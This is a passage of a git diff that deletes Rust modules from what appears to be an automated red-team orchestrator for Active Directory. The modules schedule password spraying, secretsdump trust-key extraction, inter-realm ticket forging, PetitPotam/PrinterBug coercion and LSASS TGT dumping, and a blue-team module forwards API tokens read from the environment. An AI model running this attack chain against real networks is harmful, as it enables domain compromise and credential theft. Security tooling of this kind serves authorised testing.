}) - .collect(); - state - .domain_controllers - .iter() - .filter(|(domain, _)| { - // Skip domains with pending delegation vulns - if delegation_domains.contains(&domain.to_lowercase()) { - return false; - } - // Use recovery_attempts in key so each round dispatches fresh sprays - let key = format!( - "stall_spray:{}:{}", - domain.to_lowercase(), - recovery_attempts - ); - !state.is_processed(DEDUP_PASSWORD_SPRAY, &key) - }) - .map(|(domain, dc_ip)| (domain.clone(), dc_ip.clone())) - .collect() - }; - - for (domain, dc_ip) in spray_work { - let payload = json!({ - "technique": "password_spray", - "target_ip": dc_ip, - "domain": domain, - "use_common_passwords": true, - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", payload, 7) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, domain = %domain, "Stall recovery: password spray dispatched"); - let key = format!( - "stall_spray:{}:{}", - domain.to_lowercase(), - recovery_attempts - ); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_PASSWORD_SPRAY, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_SPRAY, &key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Stall recovery: spray failed"), - } - } - } - - // 
--- Fallback 2: Low-hanging fruit (SYSVOL, GPP, LDAP descriptions, LAPS) --- - if has_creds && has_dcs { - let lhf_work: Vec<(String, String, String, ares_core::models::Credential)> = { - let state = dispatcher.state.read().await; - state - .credentials - .iter() - .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) - .filter_map(|cred| { - let cred_domain = cred.domain.to_lowercase(); - let key = format!( - "stall_lhf:{}:{}:{}", - cred_domain, - cred.username.to_lowercase(), - recovery_attempts - ); - if state.is_processed(DEDUP_EXPANSION_CREDS, &key) { - return None; - } - let dc_ip = state - .domain_controllers - .get(&cred_domain) - .cloned() - .or_else(|| { - let suffix = format!(".{cred_domain}"); - state - .domain_controllers - .iter() - .find(|(d, _)| d.ends_with(&suffix)) - .map(|(_, ip)| ip.clone()) - })?; - Some((key, dc_ip, cred_domain, cred.clone())) - }) - .take(2) - .collect() - }; - - for (key, dc_ip, domain, cred) in lhf_work { - match dispatcher - .request_low_hanging_fruit(&dc_ip, &domain, &cred, 6) - .await - { - Ok(Some(task_id)) => { - info!(task_id = %task_id, domain = %domain, "Stall recovery: low-hanging fruit dispatched"); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_EXPANSION_CREDS, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_EXPANSION_CREDS, &key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Stall recovery: low-hanging fruit failed"), - } - } - } - } -} diff --git a/ares-orchestrator/src/automation/trust.rs b/ares-orchestrator/src/automation/trust.rs deleted file mode 100644 index 99143ded..00000000 --- a/ares-orchestrator/src/automation/trust.rs +++ /dev/null @@ -1,448 +0,0 @@ -//! auto_trust_follow -- trust enumeration, key extraction, and cross-domain attacks. -//! -//! Three-phase automation: -//! -//! 1. **Trust enumeration**: When DA is achieved, dispatch `enumerate_domain_trusts` -//! to discover trust relationships via LDAP. -//! 2. **Trust key extraction**: When trusts are known and DA creds are available, -//! dispatch secretsdump for trust account hashes (e.g. `FABRIKAM$`). -//! 3. **Trust follow**: When a trust account hash is found, dispatch inter-realm -//! ticket creation and secretsdump against the foreign DC. - -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::*; - -/// Monitors for trust account hashes and dispatches cross-domain attacks. -/// Interval: 30s. -pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch::Receiver) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! 
{ - _ = interval.tick() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - // Auto-enumerate trusts when DA is achieved - { - let state = dispatcher.state.read().await; - if state.has_domain_admin { - // Dispatch trust enumeration for each known DC (once per domain) - let enum_work: Vec<(String, String, String)> = state - .domain_controllers - .iter() - .filter(|(domain, _)| { - let key = format!("trust_enum:{}", domain.to_lowercase()); - !state.is_processed(DEDUP_TRUST_FOLLOW, &key) - }) - .map(|(domain, dc_ip)| { - let key = format!("trust_enum:{}", domain.to_lowercase()); - (key, domain.clone(), dc_ip.clone()) - }) - .collect(); - drop(state); - - for (key, domain, dc_ip) in enum_work { - // Find a credential for this domain - let cred = { - let s = dispatcher.state.read().await; - s.credentials - .iter() - .find(|c| { - !c.password.is_empty() - && (c.domain.to_lowercase() == domain.to_lowercase() - || domain - .to_lowercase() - .ends_with(&format!(".{}", c.domain.to_lowercase()))) - }) - .cloned() - }; - - if let Some(cred) = cred { - let payload = json!({ - "techniques": ["enumerate_domain_trusts"], - "target_ip": dc_ip, - "domain": domain, - "credential": { - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }, - }); - - match dispatcher - .throttled_submit("recon", "recon", payload, 3) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - domain = %domain, - "Trust enumeration dispatched" - ); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) - .await; - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch trust enumeration"), - } - } - } - } - } - - // Extract trust keys for known cross-forest trusts - { - let state = dispatcher.state.read().await; - if state.has_domain_admin && !state.trusted_domains.is_empty() { - let extract_work: Vec<(String, String, String, String)> = state - .trusted_domains - .values() - .filter(|trust| trust.is_cross_forest()) - .filter_map(|trust| { - let key = format!("trust_extract:{}", trust.domain.to_lowercase()); - if state.is_processed(DEDUP_TRUST_FOLLOW, &key) { - return None; - } - // Find a DC in the source domain (our domain, not the trust target) - // The trust domain is the foreign one; we need to secretsdump our DC - let source_domain = state.domains.first()?; - let dc_ip = state - .domain_controllers - .get(&source_domain.to_lowercase()) - .cloned()?; - Some((key, trust.flat_name.clone(), trust.domain.clone(), dc_ip)) - }) - .collect(); - let admin_cred = state - .credentials - .iter() - .find(|c| c.is_admin && !c.password.is_empty()) - .cloned(); - drop(state); - - if let Some(cred) = admin_cred { - for (key, flat_name, trust_domain, dc_ip) in extract_work { - // secretsdump -just-dc-user FABRIKAM$ to get trust key - let trust_account = format!("{}$", flat_name.to_uppercase()); - let payload = json!({ - "technique": "secretsdump", - "target_ip": dc_ip, - "domain": cred.domain, - "just_dc_user": trust_account, - "credential": { - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }, - "reason": format!("extract trust key for {}", trust_domain), - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", payload, 2) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - trust_account = %trust_account, - trust_domain = %trust_domain, - 
"Trust key extraction dispatched" - ); - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) - .await; - } - Ok(None) => {} - Err(e) => { - warn!(err = %e, "Failed to dispatch trust key extraction") - } - } - } - } - } - } - - // Follow trust keys (inter-realm ticket + foreign secretsdump) - let (work, admin_cred_phase3): ( - Vec, - Option, - ) = { - let state = dispatcher.state.read().await; - - // Skip if no domain admin yet — trust extraction requires DA-level creds - if !state.has_domain_admin { - continue; - } - - // Build lookup of known trust flat names → TrustInfo so we only - // process actual trust account hashes, not random machine accounts. - let trust_by_flat: std::collections::HashMap = - state - .trusted_domains - .values() - .map(|t| (t.flat_name.to_uppercase(), t)) - .collect(); - - let admin_cred = state - .credentials - .iter() - .find(|c| c.is_admin && !c.password.is_empty()) - .cloned(); - - let items = state - .hashes - .iter() - .filter_map(|hash| { - if !hash.username.ends_with('$') { - return None; - } - - // Only process hashes that match a known trust account - let netbios = hash.username.trim_end_matches('$').to_uppercase(); - let trust = trust_by_flat.get(&netbios)?; - - // Resolve source domain — fall back to first known domain - // when secretsdump output lacks domain prefix for machine accounts - let source_domain = if hash.domain.is_empty() { - state.domains.first().cloned().unwrap_or_default() - } else { - hash.domain.clone() - }; - if source_domain.is_empty() { - return None; - } - - let dedup_key = format!( - "trust_follow:{}:{}", - source_domain.to_lowercase(), - hash.username.to_lowercase() - ); - if state.is_processed(DEDUP_TRUST_FOLLOW, &dedup_key) { - return None; - } - - // Use the FQDN from the trust relationship — never fall back - // to bare NetBIOS name which produces invalid domain strings. 
- let target_domain = trust.domain.clone(); - - let target_dc_ip = state - .domain_controllers - .get(&target_domain.to_lowercase()) - .cloned(); - - let source_domain_sid = state - .domain_sids - .get(&source_domain.to_lowercase()) - .cloned(); - let target_domain_sid = state - .domain_sids - .get(&target_domain.to_lowercase()) - .cloned(); - - let source_dc_ip = state - .domain_controllers - .get(&source_domain.to_lowercase()) - .cloned(); - - Some(TrustFollowWork { - dedup_key, - hash: hash.clone(), - source_domain, - target_domain, - target_dc_ip, - source_domain_sid, - target_domain_sid, - source_dc_ip, - }) - }) - .collect(); - - (items, admin_cred) - }; - - for item in work { - let vuln_id = format!( - "forest_trust_{}_{}", - item.source_domain.to_lowercase(), - item.target_domain.to_lowercase() - ); - let trust_target = item - .target_dc_ip - .clone() - .unwrap_or_else(|| item.target_domain.clone()); - { - let mut details = std::collections::HashMap::new(); - details.insert( - "source_domain".into(), - serde_json::Value::String(item.source_domain.clone()), - ); - details.insert( - "target_domain".into(), - serde_json::Value::String(item.target_domain.clone()), - ); - details.insert( - "trust_account".into(), - serde_json::Value::String(item.hash.username.clone()), - ); - details.insert( - "note".into(), - serde_json::Value::String(format!( - "Forest trust escalation via {} trust key — inter-realm ticket + secretsdump", - item.hash.username - )), - ); - let vuln = ares_core::models::VulnerabilityInfo { - vuln_id: vuln_id.clone(), - vuln_type: "forest_trust_escalation".to_string(), - target: trust_target, - discovered_by: "trust_automation".to_string(), - discovered_at: chrono::Utc::now(), - details, - recommended_agent: String::new(), - priority: 1, - }; - let _ = dispatcher - .state - .publish_vulnerability(&dispatcher.queue, vuln) - .await; - } - - // 1. Dispatch inter-realm ticket creation. 
- // Use field names that match the tool and prompt expectations: - // - `vuln_type` routes to generate_trust_key_prompt - // - `source_sid`/`target_sid` match create_inter_realm_ticket tool - // - `trusted_domain` is read by the trust prompt - // - Include admin creds + dc_ip so the LLM can call get_sid if SIDs are missing - let mut ticket_payload = json!({ - "technique": "create_inter_realm_ticket", - "vuln_type": "cross_forest", - "domain": item.source_domain, - "trusted_domain": item.target_domain, - "target_domain": item.target_domain, - "target": item.target_dc_ip.as_deref().unwrap_or(&item.target_domain), - "trust_key": item.hash.hash_value, - "trust_account": item.hash.username, - "vuln_id": &vuln_id, - }); - if let Some(ref sid) = item.source_domain_sid { - ticket_payload["source_sid"] = json!(sid); - } - if let Some(ref sid) = item.target_domain_sid { - ticket_payload["target_sid"] = json!(sid); - } - if let Some(ref aes) = item.hash.aes_key { - ticket_payload["aes_key"] = json!(aes); - } - if let Some(ref dc_ip) = item.source_dc_ip { - ticket_payload["dc_ip"] = json!(dc_ip); - } - if let Some(ref cred) = admin_cred_phase3 { - ticket_payload["username"] = json!(cred.username); - ticket_payload["password"] = json!(cred.password); - } - - match dispatcher - .throttled_submit("exploit", "privesc", ticket_payload, 1) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - trust_account = %item.hash.username, - source_domain = %item.source_domain, - target_domain = %item.target_domain, - has_source_sid = item.source_domain_sid.is_some(), - has_target_sid = item.target_domain_sid.is_some(), - "Inter-realm ticket task dispatched" - ); - let _ = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await; - } - Ok(None) => { - debug!("Inter-realm ticket deferred by throttler"); - continue; - } - Err(e) => { - warn!(err = %e, "Failed to dispatch inter-realm ticket"); - continue; - } - } - - // 2. If we know the target DC, dispatch secretsdump against it - if let Some(ref dc_ip) = item.target_dc_ip { - let sd_payload = json!({ - "technique": "secretsdump", - "target_ip": dc_ip, - "domain": item.target_domain, - "trust_account": item.hash.username, - "trust_key": item.hash.hash_value, - }); - - match dispatcher - .throttled_submit("credential_access", "credential_access", sd_payload, 2) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - target_dc = %dc_ip, - target_domain = %item.target_domain, - "Cross-domain secretsdump dispatched" - ); - } - Ok(None) => {} - Err(e) => warn!(err = %e, "Failed to dispatch cross-domain secretsdump"), - } - } - - // Mark as processed - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_TRUST_FOLLOW, item.dedup_key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key) - .await; - } - } -} - -struct TrustFollowWork { - dedup_key: String, - hash: ares_core::models::Hash, - source_domain: String, - target_domain: String, - target_dc_ip: Option, - source_domain_sid: Option, - target_domain_sid: Option, - source_dc_ip: Option, -} diff --git a/ares-orchestrator/src/automation/unconstrained.rs b/ares-orchestrator/src/automation/unconstrained.rs deleted file mode 100644 index 162009f0..00000000 --- a/ares-orchestrator/src/automation/unconstrained.rs +++ /dev/null @@ -1,385 +0,0 @@ -//! auto_unconstrained_exploitation -- coerce-and-dump for unconstrained delegation. -//! -//! When a machine account with unconstrained delegation is discovered (e.g. 
-//! `DC02$`), this automation orchestrates the full attack chain: -//! -//! 1. **Coerce** a DC to authenticate to the unconstrained delegation host -//! (PetitPotam / PrinterBug). The DC's TGT is cached in LSASS on that host. -//! 2. **Dump** cached TGTs from the host's LSASS memory via lsassy. -//! 3. **Chain** — result_processing's `auto_chain_s4u_secretsdump` picks up any -//! `.ccache` ticket and dispatches secretsdump automatically. -//! -//! User accounts with unconstrained delegation (e.g. `sarah.connor`) are left to -//! the LLM-driven exploit path since we can't determine the target host. - -use std::collections::HashMap; -use std::sync::Arc; -use std::time::Duration; - -use serde_json::json; -use tokio::sync::watch; -use tokio::time::Instant; -use tracing::{debug, info, warn}; - -use crate::dispatcher::Dispatcher; -use crate::state::DEDUP_COERCED_DCS; - -/// Delay after coercion before dispatching the first TGT dump, giving the -/// coerced authentication time to complete and the TGT to land in LSASS. -const COERCE_TO_DUMP_DELAY: Duration = Duration::from_secs(15); - -/// Maximum TGT dump attempts per vulnerability before giving up. -const MAX_DUMP_ATTEMPTS: u32 = 3; - -/// Delay between successive dump retries for the same vuln. -const DUMP_RETRY_DELAY: Duration = Duration::from_secs(60); - -// ----------------------------------------------------------------------- -// Phase tracking (in-memory only — intentionally not persisted so restarts -// re-trigger the chain, since cached TGTs expire quickly). -// ----------------------------------------------------------------------- - -#[derive(Debug)] -struct PhaseState { - coercion_dispatched_at: Option, - dump_attempts: u32, - last_dump_at: Option, - completed: bool, -} - -/// Monitors for unconstrained delegation vulns and orchestrates coerce → dump. -/// Interval: 20s. Wakes on delegation_notify and credential_access_notify. -pub async fn auto_unconstrained_exploitation( - dispatcher: Arc, - mut shutdown: watch::Receiver, -) { - let deleg_notify = dispatcher.delegation_notify.clone(); - let cred_notify = dispatcher.credential_access_notify.clone(); - let mut interval = tokio::time::interval(Duration::from_secs(20)); - interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - let mut phases: HashMap = HashMap::new(); - - loop { - tokio::select! { - _ = interval.tick() => {}, - _ = deleg_notify.notified() => {}, - _ = cred_notify.notified() => {}, - _ = shutdown.changed() => break, - } - if *shutdown.borrow() { - break; - } - - let work: Vec = { - let state = dispatcher.state.read().await; - - if state.has_domain_admin { - continue; - } - - state - .discovered_vulnerabilities - .values() - .filter_map(|vuln| { - if vuln.vuln_type.to_lowercase() != "unconstrained_delegation" { - return None; - } - if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { - return None; - } - - let account_name = vuln - .details - .get("account_name") - .and_then(|v| v.as_str())? - .to_string(); - - let domain = vuln - .details - .get("domain") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - - // Skip completed vulns - if phases.get(&vuln.vuln_id).is_some_and(|p| p.completed) { - return None; - } - - // Only automate machine accounts — we can resolve hostname → IP. - // User accounts (sarah.connor) go through the LLM exploit path. - if !account_name.ends_with('$') { - return None; - } - - // Resolve machine hostname → IP from discovered hosts. - // DC02$ → look for host with hostname starting with "dc02". 
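// The resolution described above, as a stand-alone sketch; `Host` and
// `resolve_machine_account` are illustrative names, not the ares types.
struct Host {
    hostname: String,
    ip: String,
}

fn resolve_machine_account(account: &str, hosts: &[Host]) -> Option<String> {
    let prefix = account.trim_end_matches('$').to_lowercase();
    hosts.iter().find_map(|h| {
        let name = h.hostname.to_lowercase();
        (name == prefix || name.starts_with(&format!("{prefix}."))).then(|| h.ip.clone())
    })
}

// resolve_machine_account("DC02$", ...) matches "dc02" and
// "dc02.child.contoso.local" but not "dc022" — the same rule the unit tests
// at the bottom of this file assert.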
- let hostname_prefix = account_name.trim_end_matches('$').to_lowercase(); - let host_ip = state.hosts.iter().find_map(|h| { - let h_lower = h.hostname.to_lowercase(); - if h_lower == hostname_prefix - || h_lower.starts_with(&format!("{hostname_prefix}.")) - { - Some(h.ip.clone()) - } else { - None - } - })?; - - // Find a DC in the same domain — this is what we coerce FROM. - let dc_ip = state - .domain_controllers - .get(&domain.to_lowercase()) - .cloned(); - - // Find any non-quarantined credential for this domain. - let credential = state - .credentials - .iter() - .find(|c| { - c.domain.to_lowercase() == domain.to_lowercase() - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - .cloned(); - - if credential.is_none() { - debug!( - vuln_id = %vuln.vuln_id, - "Unconstrained: no credential available yet" - ); - return None; - } - - // Determine action based on current phase. - let phase = phases.get(&vuln.vuln_id); - - // If auto_coercion already coerced this DC, skip straight to dump. - let already_coerced = dc_ip - .as_ref() - .is_some_and(|ip| state.is_processed(DEDUP_COERCED_DCS, ip)); - - let action = match phase { - // No phase yet — dispatch coercion (or skip if already coerced). - None if already_coerced => Action::Dump, - None if dc_ip.is_some() => Action::Coerce, - None => { - debug!( - vuln_id = %vuln.vuln_id, - "Unconstrained: no DC found for coercion" - ); - return None; - } - - // Coercion dispatched, waiting for delay before dump. - Some(p) - if p.coercion_dispatched_at.is_some() - && p.dump_attempts == 0 - && p.coercion_dispatched_at.unwrap().elapsed() - >= COERCE_TO_DUMP_DELAY => - { - Action::Dump - } - - // Dump retry — previous attempt didn't yield TGTs. - Some(p) - if p.dump_attempts > 0 - && p.dump_attempts < MAX_DUMP_ATTEMPTS - && p.last_dump_at - .is_none_or(|t| t.elapsed() >= DUMP_RETRY_DELAY) => - { - Action::Dump - } - - _ => return None, - }; - - Some(UnconstrainedWork { - vuln_id: vuln.vuln_id.clone(), - account_name, - domain, - host_ip, - dc_ip, - credential, - action, - }) - }) - .collect() - }; - - for item in work { - match item.action { - Action::Coerce => { - let dc_ip = match &item.dc_ip { - Some(ip) => ip.clone(), - None => continue, - }; - - let cred = match &item.credential { - Some(c) => c, - None => continue, - }; - - // Coerce DC → unconstrained host. The DC's TGT is cached - // in the unconstrained host's LSASS. 
- let payload = json!({ - "target_ip": dc_ip, - "listener_ip": item.host_ip, - "techniques": ["petitpotam", "printerbug"], - "credential": { - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }, - "reason": "unconstrained_delegation_coercion", - }); - - match dispatcher - .throttled_submit("coercion", "coercion", payload, 8) - .await - { - Ok(Some(task_id)) => { - info!( - task_id = %task_id, - vuln_id = %item.vuln_id, - account = %item.account_name, - dc = %dc_ip, - listener = %item.host_ip, - "Unconstrained delegation: coercion dispatched (DC → host)" - ); - phases.insert( - item.vuln_id.clone(), - PhaseState { - coercion_dispatched_at: Some(Instant::now()), - dump_attempts: 0, - last_dump_at: None, - completed: false, - }, - ); - } - Ok(None) => { - debug!(vuln_id = %item.vuln_id, "Coercion deferred by throttler"); - } - Err(e) => { - warn!( - err = %e, - vuln_id = %item.vuln_id, - "Failed to dispatch unconstrained coercion" - ); - } - } - } - - Action::Dump => { - let cred = match &item.credential { - Some(c) => c, - None => continue, - }; - - let payload = json!({ - "technique": "unconstrained_tgt_dump", - "vuln_type": "unconstrained_delegation", - "vuln_id": item.vuln_id, - "target": item.host_ip, - "target_ip": item.host_ip, - "domain": item.domain, - "account_name": item.account_name, - "credential": { - "username": cred.username, - "password": cred.password, - "domain": cred.domain, - }, - }); - - match dispatcher - .throttled_submit("exploit", "privesc", payload, 9) - .await - { - Ok(Some(task_id)) => { - let phase = phases.entry(item.vuln_id.clone()).or_insert(PhaseState { - coercion_dispatched_at: None, - dump_attempts: 0, - last_dump_at: None, - completed: false, - }); - phase.dump_attempts += 1; - phase.last_dump_at = Some(Instant::now()); - - info!( - task_id = %task_id, - vuln_id = %item.vuln_id, - attempt = phase.dump_attempts, - target = %item.host_ip, - "Unconstrained delegation: TGT dump dispatched" - ); - - if phase.dump_attempts >= MAX_DUMP_ATTEMPTS { - phase.completed = true; - debug!( - vuln_id = %item.vuln_id, - "Unconstrained delegation: max dump attempts reached" - ); - } - } - Ok(None) => { - debug!(vuln_id = %item.vuln_id, "TGT dump deferred by throttler"); - } - Err(e) => { - warn!( - err = %e, - vuln_id = %item.vuln_id, - "Failed to dispatch TGT dump" - ); - } - } - } - } - } - } -} - -#[derive(Debug)] -enum Action { - Coerce, - Dump, -} - -struct UnconstrainedWork { - vuln_id: String, - account_name: String, - domain: String, - host_ip: String, - dc_ip: Option, - credential: Option, - action: Action, -} - -#[cfg(test)] -mod tests { - #[test] - fn test_hostname_resolution_machine_account() { - // DC02$ → "dc02" - let account = "DC02$"; - let prefix = account.trim_end_matches('$').to_lowercase(); - assert_eq!(prefix, "dc02"); - - // Should match "dc02.child.contoso.local" - let hostname = "dc02.child.contoso.local"; - let h_lower = hostname.to_lowercase(); - assert!(h_lower == prefix || h_lower.starts_with(&format!("{prefix}."))); - } - - #[test] - fn test_hostname_resolution_short_name() { - let account = "DC01$"; - let prefix = account.trim_end_matches('$').to_lowercase(); - assert_eq!(prefix, "dc01"); - - // Should match "dc01" - assert!("dc01" == prefix); - // Should match "dc01.contoso.local" - assert!("dc01.contoso.local".starts_with(&format!("{prefix}."))); - // Should NOT match "dc011.contoso.local" - assert!(!"dc011.contoso.local".starts_with(&format!("{prefix}."))); - } -} diff --git 
a/ares-orchestrator/src/automation_spawner.rs b/ares-orchestrator/src/automation_spawner.rs
deleted file mode 100644
index e524bc4e..00000000
--- a/ares-orchestrator/src/automation_spawner.rs
+++ /dev/null
@@ -1,47 +0,0 @@
-use std::sync::Arc;
-
-use tokio::sync::watch;
-use tracing::info;
-
-use crate::automation;
-use crate::dispatcher::Dispatcher;
-
-/// Spawn all automation background tasks. Returns their JoinHandles.
-pub(crate) fn spawn_automation_tasks(
-    dispatcher: Arc<Dispatcher>,
-    shutdown_rx: watch::Receiver<bool>,
-) -> Vec<tokio::task::JoinHandle<()>> {
-    let mut handles = Vec::new();
-
-    macro_rules! spawn_auto {
-        ($name:ident) => {{
-            let d = dispatcher.clone();
-            let s = shutdown_rx.clone();
-            handles.push(tokio::spawn(async move {
-                automation::$name(d, s).await;
-            }));
-        }};
-    }
-
-    spawn_auto!(auto_crack_dispatch);
-    spawn_auto!(auto_mssql_detection);
-    spawn_auto!(auto_adcs_enumeration);
-    spawn_auto!(auto_share_enumeration);
-    spawn_auto!(auto_share_spider);
-    spawn_auto!(auto_bloodhound);
-    spawn_auto!(auto_delegation_enumeration);
-    spawn_auto!(auto_coercion);
-    spawn_auto!(auto_local_admin_secretsdump);
-    spawn_auto!(auto_credential_access);
-    spawn_auto!(auto_credential_expansion);
-    spawn_auto!(auto_golden_ticket);
-    spawn_auto!(auto_acl_chain_follow);
-    spawn_auto!(auto_trust_follow);
-    spawn_auto!(auto_s4u_exploitation);
-    spawn_auto!(auto_gmsa_extraction);
-    spawn_auto!(auto_unconstrained_exploitation);
-    spawn_auto!(auto_stall_detection);
-
-    info!(count = handles.len(), "Automation tasks spawned");
-    handles
-}
diff --git a/ares-orchestrator/src/blue/auto_submit.rs b/ares-orchestrator/src/blue/auto_submit.rs
deleted file mode 100644
index 524106df..00000000
--- a/ares-orchestrator/src/blue/auto_submit.rs
+++ /dev/null
@@ -1,246 +0,0 @@
-//! Auto-submit blue team investigations from red team operation state.
-//!
-//! When `ARES_BLUE_ENABLED=1`, this background task watches for red team
-//! findings and automatically submits investigation requests to the
-//! `ares:blue:investigations` queue. Without this, the blue orchestrator
-//! polls an empty queue forever — investigation requests must be pushed
-//! explicitly (via CLI) or auto-submitted (this module).
-
-use std::sync::Arc;
-use std::time::Duration;
-
-use anyhow::Result;
-use chrono::Utc;
-use redis::AsyncCommands;
-use tokio::sync::watch;
-use tracing::{info, warn};
-
-use crate::config::OrchestratorConfig;
-use crate::state::SharedState;
-use crate::task_queue::TaskQueue;
-
-/// Minimum red team activity before submitting a blue investigation.
-const MIN_CREDENTIALS: usize = 1;
-const MIN_HOSTS: usize = 2;
-
-/// How long to wait after orchestrator start before first check.
-const INITIAL_DELAY_SECS: u64 = 90;
-
-/// How often to check if a new investigation should be submitted.
-const CHECK_INTERVAL_SECS: u64 = 30;
-
-/// Collect env vars that blue tools need (Grafana, Loki, etc.).
-fn collect_blue_env_vars() -> std::collections::HashMap<String, String> {
-    const NAMES: &[&str] = &[
-        "OPENAI_API_KEY",
-        "ANTHROPIC_API_KEY",
-        "GRAFANA_SERVICE_ACCOUNT_TOKEN",
-        "GRAFANA_URL",
-        "LOKI_URL",
-        "LOKI_AUTH_TOKEN",
-        "PROMETHEUS_URL",
-    ];
-    let mut map = std::collections::HashMap::new();
-    for name in NAMES {
-        if let Ok(val) = std::env::var(name) {
-            if !val.is_empty() {
-                map.insert(name.to_string(), val);
-            }
-        }
-    }
-    map
-}
-
-/// Spawn the blue auto-submit task as a background tokio task.
-pub fn spawn_blue_auto_submit( - queue: TaskQueue, - shared_state: SharedState, - config: Arc, - model_spec: String, - shutdown_rx: watch::Receiver, -) -> tokio::task::JoinHandle<()> { - tokio::spawn(async move { - if let Err(e) = auto_submit_loop(queue, shared_state, config, model_spec, shutdown_rx).await - { - warn!("Blue auto-submit exited with error: {e}"); - } - }) -} - -async fn auto_submit_loop( - queue: TaskQueue, - shared_state: SharedState, - config: Arc, - model_spec: String, - mut shutdown_rx: watch::Receiver, -) -> Result<()> { - info!("Blue auto-submit: waiting {INITIAL_DELAY_SECS}s for red team activity"); - - // Wait for initial red team activity - tokio::select! { - _ = tokio::time::sleep(Duration::from_secs(INITIAL_DELAY_SECS)) => {} - _ = shutdown_rx.changed() => return Ok(()), - } - - let mut submitted = false; - - loop { - if *shutdown_rx.borrow() { - break; - } - - if !submitted { - let state = shared_state.read().await; - let cred_count = state.credentials.len(); - let host_count = state.hosts.len(); - let vuln_count = state.discovered_vulnerabilities.len(); - let has_enough = cred_count >= MIN_CREDENTIALS || host_count >= MIN_HOSTS; - drop(state); - - if has_enough { - info!( - credentials = cred_count, - hosts = host_count, - vulns = vuln_count, - "Blue auto-submit: red team has enough findings, submitting investigation" - ); - - match submit_investigation(&queue, &shared_state, &config, &model_spec).await { - Ok(inv_id) => { - info!( - investigation_id = %inv_id, - operation_id = %config.operation_id, - "Blue auto-submit: investigation queued" - ); - submitted = true; - } - Err(e) => { - warn!("Blue auto-submit: failed to submit investigation: {e}"); - } - } - } - } - - if submitted { - // Done — exit the loop - break; - } - - tokio::select! { - _ = tokio::time::sleep(Duration::from_secs(CHECK_INTERVAL_SECS)) => {} - _ = shutdown_rx.changed() => break, - } - } - - info!("Blue auto-submit task finished"); - Ok(()) -} - -/// Build and submit a blue investigation request from the current red team state. 
-async fn submit_investigation( - queue: &TaskQueue, - shared_state: &SharedState, - config: &OrchestratorConfig, - model_spec: &str, -) -> Result { - let state = shared_state.read().await; - let now = Utc::now(); - - let op_id = &config.operation_id; - let inv_id = format!("inv-{}", now.format("%Y%m%d-%H%M%S")); - - // Collect target data from state - let target_ips: Vec = state.hosts.iter().map(|h| h.ip.clone()).collect(); - let target_users: Vec = state - .credentials - .iter() - .map(|c| c.username.clone()) - .collect(); - let cred_count = state.credentials.len(); - let host_count = state.hosts.len(); - let vuln_count = state.discovered_vulnerabilities.len(); - let domains: Vec = state.domains.clone(); - - // Collect MITRE techniques from timeline if available - let techniques: Vec = Vec::new(); // Timeline techniques would need Redis lookup - - drop(state); - - let grafana_url = std::env::var("GRAFANA_URL").ok(); - let grafana_token = std::env::var("GRAFANA_SERVICE_ACCOUNT_TOKEN").ok(); - - // Build synthetic alert (mirrors ares-cli blue from-operation) - let operation_context = serde_json::json!({ - "operation_id": op_id, - "attack_window_start": now.to_rfc3339(), - "attack_window_end": now.to_rfc3339(), - "techniques_used": techniques, - "domains": domains, - }); - - let alert = serde_json::json!({ - "labels": { - "alertname": format!("RedTeamOperation_{op_id}"), - "severity": "critical", - "source": "ares-red-team", - }, - "annotations": { - "summary": format!( - "Red team operation {op_id} - {cred_count} credentials, {host_count} hosts, {vuln_count} vulnerabilities", - ), - "description": format!( - "Investigate blue team detection coverage for red team operation {op_id}. \ - Operation is in progress.", - ), - }, - "operation_context": operation_context, - "startsAt": now.to_rfc3339(), - "target_ips": &target_ips[..std::cmp::min(target_ips.len(), 50)], - "target_users": &target_users[..std::cmp::min(target_users.len(), 50)], - }); - - // Strip provider prefix for the model name (blue runner does this too) - let model = model_spec - .split_once('/') - .map(|(_, name)| name) - .unwrap_or(model_spec); - - let request = serde_json::json!({ - "investigation_id": inv_id, - "alert": alert, - "correlation_context": null, - "model": model, - "max_steps": 75, - "multi_agent": true, - "auto_route": false, - "report_dir": null, - "operation_id": op_id, - "grafana_url": grafana_url, - "grafana_api_key": grafana_token, - "submitted_at": now.to_rfc3339(), - }); - - let mut conn = 